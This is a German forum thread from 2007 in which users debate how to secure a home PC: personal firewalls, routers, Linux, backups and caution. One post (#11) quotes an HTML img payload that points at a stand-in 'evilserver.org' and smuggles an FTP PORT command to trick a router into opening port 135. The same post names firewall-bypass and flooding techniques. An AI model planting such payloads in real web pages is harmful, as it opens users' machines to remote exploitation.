Wie Sichert Ihr Euren Pc Gegen Internet Attacken?
#1
geschrieben 07. Januar 2007 - 01:07
Anzeige
#2
geschrieben 07. Januar 2007 - 01:27
#3
geschrieben 07. Januar 2007 - 01:30
zado717 sagte:
Das würde sinngemäß Punkt 3 entsprechen.
For Emails always use OpenPGP. My KeyID: 0xA1E011A4
#4
geschrieben 07. Januar 2007 - 01:51
5) Brain.exe + Backup in der Hinterhand.
#5
geschrieben 08. Januar 2007 - 00:37
Traut Euch und seit ehrlich mit der Bewertung!
Von diversen Zwitterlösungen bei den Beantwortungen wie dies zum Teil JA und dies zum Teil NEIN habe ich aus (mir bekanntem Grund) abgesehen.
Brain.exe ist mir zu abgetroschen. Manche glauben es zu haben, haben es aber auch nicht. Und hellsehen kann hier leider auch niemand.
Ein Backup für den Notfall ist ne Lösung für danach und nicht für davor.
Wäre auch mal ne Umfrage wert zu fragen was ihr macht wenn ein Problem bereits vorhanden ist.
Naja, beim nächsten mal.
#6
geschrieben 08. Januar 2007 - 02:32
- Router
- Linux (als OS)
- nichts von dem
#7
geschrieben 08. Januar 2007 - 02:44
Zitat (Großer: 08.01.2007, 02:32)
- Router
- Linux (als OS)
- nichts von dem
Ja, ist ja gut. War meine erste Umfrage.
Linux ist wie du weist ein Betriebssystem. XP ist das auch.
Das als Antwort wäre wie:
Welchen Sprit tankt ihr?
1) ... Super
2) ... Normal
3) ... Diesel
4) ... Kirschwasser
#8
geschrieben 08. Januar 2007 - 03:55
man braucht ein Sicherheitskonzept und dass gibt es nicht von der Stange.
Ein Sicherheitskonzept muss alle Rechner umfassen, also das gesamte LAN.
Eine PFW kann je nach Sicherheitskonzept sogar sinnvoll sein, z.B. man hat Kids, und was die alles runterladen oder wo draufklicken, also sichern die Eltern ihren PC durch eine gute PFW.
Also ein Schutz gegen die anderen PC's im LAN, ein Virus oder Trojaner kann nicht eine PFW auf einen anderen PC ausschalten oder umgehen, es bleiben nur DoS Angriffe, und dagegen muss die PFW abgesichert sein.
#9
geschrieben 08. Januar 2007 - 04:02
Zitat
Wie formulier ich das jetzt am besten? Ah, ich weis,
Zitat
Bitte einmal verständlich umformulieren, thx.
Zu verkaufen:
Xbox, komplett PC (WF Link)
Hardware, Games, Comics und noch mehr Zeug (eBay-KA Link)
#10
geschrieben 08. Januar 2007 - 06:33
Zitat
Und wenns runtergeladen ist wird das ganze auch ausgeführt. Falls irgendeine (anti)Virus-Software installiert ist, meckert die vielleicht mal kurz, aber was stört das die Kids ? Das wird eben weggeklickt. Die wollen ja schlieslich ihr Spiel spielen und lassen sich von sowas doch nicht beirren.
"Kids" sollten Eltern sowieso nicht alleine ans internet lassen .. medienkompetenz ist hier das Stichwort und nicht irgendwelche software die jeder 5 Jährige aushebeln kann. (was bei einer PFW natürlich garnicht erst nötig ist)
#11
geschrieben 08. Januar 2007 - 07:16
<img src="ftp://evilserver.org/%10%13PORT%20192,168,0,1,0,135"/> in eine Webseite reicht meist schon, damit der munter fröhlich glaubt, daß du eine Verbindung auf Port 135/TCP erlaubst und schwuppdiewupp kommt der RPC-Exploit rein. Von echten Protokoll-Implementierung mit Java oder Flash ganz zu schweigen, insbesondere kann man bei Flash sogar den Sourceport < 1024 festlegen und somit auch ohne NAT-Helper einwandfreie NAT-Mappings für alles mögliche erstellen.
Zitat
Linux ist ein Kernel. Das weiß jeder, außer kernel.org?
Zitat
Die Kids sind aber schlauer als die Eltern. Und die Malware sowieso. Meist ist die PFW für beide eine gute Gelegenheit, Adminrechte zu erlangen.
Zitat
Oh doch, das Umgehen ist idR sehr einfach. Ob jetzt nun mit einem Tunnel oder direkt auf IP-Ebene durch überlappende IP-Fragmente das ganze Regelwerk komplett ausgehebelt wird, ist aber relativ egal, denn...
Zitat
mit denen man die meisten PFWs sowieso ganz einfach abschießen kann. Im Zweifelsfalle bringt ein wilder Mix aus SYN-, UDP- und ICMP-Floods bringen selbst auf einem 10MBit-Ethernet einen PFW-infizierten Rechner egal welcher Leistungsstärke zuverlässig zum Stillstand.
Ja, mata ne!
(For sending email please use OpenPGP encryption and signing. KeyID: 0xA0E28D18)
#12
geschrieben 08. Januar 2007 - 07:50
Zitat (DekenFrost: 08.01.2007, 06:33)
Gaaaanz richtig, ich lass meine Eltern auch nicht allein ins Netz scnr
Zitat (Rika: 08.01.2007, 07:16)
It's GNU we know
(Marco Gercke)
#13
geschrieben 08. Januar 2007 - 09:06
Zitat (Hamtaro: 08.01.2007, 00:37)
Brain.exe ist mir zu abgetroschen. Manche glauben es zu haben, haben es aber auch nicht. Und hellsehen kann hier leider auch niemand.
[...]
Da liegst Du aber nicht so ganz richtig. "Brain.exe" heißt ja nicht unbedingt, dass jemand dermaßen hellseherisch begabt ist, dass er automatisch mitkriegt, wenn sich da im Hintergrund was Böses auf dem PC tut. Es heißt aber sehr wohl, z. B. von vorneherin bei gewissen URLs oder auch ausführbaren Dateien auf ein Ansurfen bzw. Ausführen zu verzichten, da man, wenn man nicht völlig ahnungslos im Web herumirrt, nach ein paar Jährchen oftmals seine Pappenheimer schon am Gang, äääh, Namen ziemlich eindeutig erkennt. Und wenn ich mich in Grauzonen bewege, sollte mir doch wohl bewußt sein, was ich mir da einhandeln könnte. Also ich finde jedenfalls meine Brain.exe nicht sooo untauglich, hat mich zumindest bisher recht zuverlässig vor Kompromittierung bewahrt.
P.S.: Da ich ziemlich oft von "Opfern" zu Rate gezogen werde, die sich irgendeinen Schrott eingefangen haben, kann ich mit Fug & Recht behaupten, dass NIEMAND, den ich kenne, auch nur ein einziges Mal einer fiesen "Attacke" zum Opfer gefallen ist. Diese Kandidaten haben alle ohne Ausnahme zugegeben, irgendwas "mal eben schnell" selbst angeklickt zu haben. So, und jetzt kommst Du nochmal mit Deiner Anti-Brain-Theorie...
Dieser Beitrag wurde von DON666 bearbeitet: 08. Januar 2007 - 09:48
Queens Of The Stone Age
Fu Manchu
Napalm Death
Liar
Grim Tales... ^^
SysProfile
"Is my cock big enough,
is my brain small enough
for you to make me a star?"
(Jello Biafra "Pull My Strings")
#14
geschrieben 08. Januar 2007 - 10:00
@Rika habe ich dir schon mal gesagt, dass ich deine Erklärungen über alles liebe?
@Topic
Benutzerrechte + ordentliche Dienstekonfiguration.
Wenn man das als Sicherheitsfeature bezeichnen will, zusätzlich ein Router mit Portforwarding (leider nur einseitig).
#15
geschrieben 08. Januar 2007 - 14:49